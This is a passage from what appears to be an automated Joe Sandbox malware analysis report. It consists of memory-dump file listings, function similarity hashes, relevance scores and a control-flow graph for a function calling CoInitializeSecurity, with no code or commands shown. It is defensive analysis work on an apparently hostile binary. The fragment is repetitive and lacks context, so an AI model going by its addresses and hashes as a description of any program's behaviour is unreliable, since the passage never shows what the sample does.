                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                        Function 00644C40 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: @
                                                                        • API String ID: 2994545307-2766056989
                                                                        • Opcode ID: ce457ea52d5497708fbcdb8c183751ba29e2c99537e2943f1d6d90868d0f9014
                                                                        • Instruction ID: e80e2c7800e2e8eab45a5ea7498915fe554735f5b9aba92c651c8e3ac82cda99
                                                                        • Opcode Fuzzy Hash: ce457ea52d5497708fbcdb8c183751ba29e2c99537e2943f1d6d90868d0f9014
                                                                        • Instruction Fuzzy Hash: BB3124715083019BD318DF68D8D27ABB7F6FF95310F14992CEA8587380D7349948CB52
                                                                        Function 0062AB20 Relevance: .5, Instructions: 477COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2926bd5aaa934aeae4a4f58511c126380ab6682ad4c31e2ef284183a05b25744
                                                                        • Instruction ID: b1c644583fb15b4b564ef3c6f11311491bceb13ffcae805c9a242476e38b4338
                                                                        • Opcode Fuzzy Hash: 2926bd5aaa934aeae4a4f58511c126380ab6682ad4c31e2ef284183a05b25744
                                                                        • Instruction Fuzzy Hash: 6DD18D727487114BDB148E6898817EB77E3EF95314F18892CE9858B3D1E374DD0ADB82
                                                                        Function 0063B7B0 Relevance: .3, Instructions: 288COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa4aae8c8d88b79d1010cf7cdcf28bf577fc2c5b5ce4adc70636b2f849b11af2
                                                                        • Instruction ID: 7d6960337cf3e0a64cfaaf2ce13d85d34e0a13e03f7657951d3388ef9d4b7acf
                                                                        • Opcode Fuzzy Hash: fa4aae8c8d88b79d1010cf7cdcf28bf577fc2c5b5ce4adc70636b2f849b11af2
                                                                        • Instruction Fuzzy Hash: A4B1387260C3808BD3149A38C85436ABBD3ABDA314F1C9A6EE6D6873D6DB74C9058357
                                                                        Function 0062A510 Relevance: .2, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6da4f4a74f23f46dfe0632ab80e25fcf28afdc4721014a6698d7cf6f7ef5d5c1
                                                                        • Instruction ID: 32e1a37e565eb96f18ebb8ff52d33d2e204e4f62881039b2962d99a2d05b2592
                                                                        • Opcode Fuzzy Hash: 6da4f4a74f23f46dfe0632ab80e25fcf28afdc4721014a6698d7cf6f7ef5d5c1
                                                                        • Instruction Fuzzy Hash: 31414836708311CFE7189F24EC527AA73E6EB8A314F09983DE586D33A0D674E855CB42
                                                                        Function 00610CA0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 308COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 600 610ca0-610cbb CoInitializeSecurity 601 610cc2-610ccd call 63bb70 600->601 602 610ddd 600->602 605 610cd2-610ce6 601->605 604 610de3 602->604 606 610de6-610def 604->606 607 610cf0-610d0e 605->607 608 610df1-610df4 606->608 609 610e0b-610e13 606->609 607->607 610 610d10-610d5f 607->610 611 610e00-610e09 608->611 612 610e15-610e19 609->612 613 610e2d 609->613 614 610d60-610d8e 610->614 611->609 611->611 615 610e20-610e29 612->615 617 610e30-610ee6 613->617 614->614 616 610d90-610d9c 614->616 615->615 619 610e2b 615->619 620 610dbb-610dc3 616->620 621 610d9e-610da1 616->621 618 610ef0-610f23 617->618 618->618 622 610f25-610f4b 618->622 619->617 620->604 623 610dc5-610dc9 620->623 624 610db0-610db9 621->624 625 610f50-610f89 622->625 626 610dd0-610dd9 623->626 624->620 624->624 625->625 627 610f8b-610fa9 call 60fa80 625->627 626->626 628 610ddb 626->628 630 610fae-610fb4 627->630 628->606 631 610fbb-610fc8 630->631 632 61103d-611046 call 603dc0 630->632 633 610fcf-610ff7 630->633 631->631 631->633 637 610ff9-610ffc 633->637 638 610ffe 633->638 637->638 639 610fff-611007 637->639 638->639 640 611009-61100c 639->640 641 61100e 639->641 640->641 642 61100f-611036 call 60c880 call 63c620 call 63e210 640->642 641->642 642->631 642->632 642->633
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00610CB3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
